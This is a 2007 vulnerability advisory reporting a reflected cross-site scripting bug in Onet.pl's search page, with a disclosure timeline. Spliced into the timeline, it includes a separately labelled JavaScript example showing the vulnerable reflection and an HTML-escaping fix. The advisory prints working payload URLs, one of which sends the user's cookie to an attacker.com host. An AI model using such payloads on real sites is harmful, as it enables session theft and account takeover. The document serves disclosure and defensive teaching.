+ Subject:
XSS bug for www.onet.pl
+ Version:
2007.03.04
+ Discovered by:
Kanedaaa: http://kaneda.bohater.net
+ onet.pl Description:
Onet.pl is the most famous Polish web portal.
It is an interactive communication platform that runs a system of millions of e-mail accounts (poczta.onet.pl).
+ Description:
XSS IN:
http://tygodnik.onet.pl/fts.html?qt=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&szukaj.x=0&szukaj.y=0
http://tygodnik.onet.pl/fts.html?qt=%22%3E%3Cscript%3Elocation.href='http://attacker.com/xss.php?cook='%2Bescape(document.cookie)%3C%2Fscript%3E&szukaj.x=0&szukaj.y=0
This makes it possible to take over a user account of the mail service at http://poczta.onet.pl [and others in the *.onet.pl domain] when a logged-in user clicks a specially crafted URL.
+ Timeline:
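The `qt` value in the URLs above starts with `">`, which suggests the search term was reflected into a quoted HTML attribute without encoding. The following is an added example, not code from the advisory or from Onet: it renders the same parameter unencoded and then encoded, and the `<input>` markup and all function names are assumptions.

```javascript
// Constructed model of a search page that reflects `qt` into an
// <input value="..."> attribute. The markup is assumed, not Onet's.

// First URL from the advisory (the alert() proof of concept).
const ADVISORY_URL =
  "http://tygodnik.onet.pl/fts.html?qt=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&szukaj.x=0&szukaj.y=0";

// Extract and percent-decode the search term, as a server framework would.
function searchTerm(url) {
  return new URL(url).searchParams.get("qt") ?? "";
}

// Vulnerable: the decoded value is concatenated as-is, so the leading `">`
// closes the attribute and the tag, and the rest is parsed as new markup.
function renderVulnerable(qt) {
  return '<input type="text" name="qt" value="' + qt + '">';
}

// Characters that are significant in HTML text and in quoted attributes.
const HTML_ENTITIES = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };

// Single-pass replacement, so "&" in the input is never double-encoded.
function escapeHtml(s) {
  return String(s).replace(/[&<>"']/g, (c) => HTML_ENTITIES[c]);
}

// Hardened: the value is entity-encoded for the attribute context.
function renderHardened(qt) {
  return '<input type="text" name="qt" value="' + escapeHtml(qt) + '">';
}

// Regression check: count tag openers in the rendered fragment.
// The template itself contributes exactly one (<input ...>).
function tagCount(html) {
  return (html.match(/<[a-zA-Z\/]/g) || []).length;
}

const qt = searchTerm(ADVISORY_URL);
console.log("vulnerable:", renderVulnerable(qt), "tags:", tagCount(renderVulnerable(qt)));
console.log("hardened:  ", renderHardened(qt), "tags:", tagCount(renderHardened(qt)));
```

Output encoding closes the injection point; marking the session cookie `HttpOnly` additionally keeps it out of `document.cookie`, which limits the account takeover described above if another reflection is missed.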
2007.03.04 bug discovered
2007.03.04 bug sent via email from http://pomoc.onet.pl/index.html?KAT=1148
2007.03.07 response via email from Abuse Onet
2007.03.30 it's fixed now (probably fixed earlier)
Original Advisory: http://kaneda.bohater.net/security/20070304-xss-onet.pl.php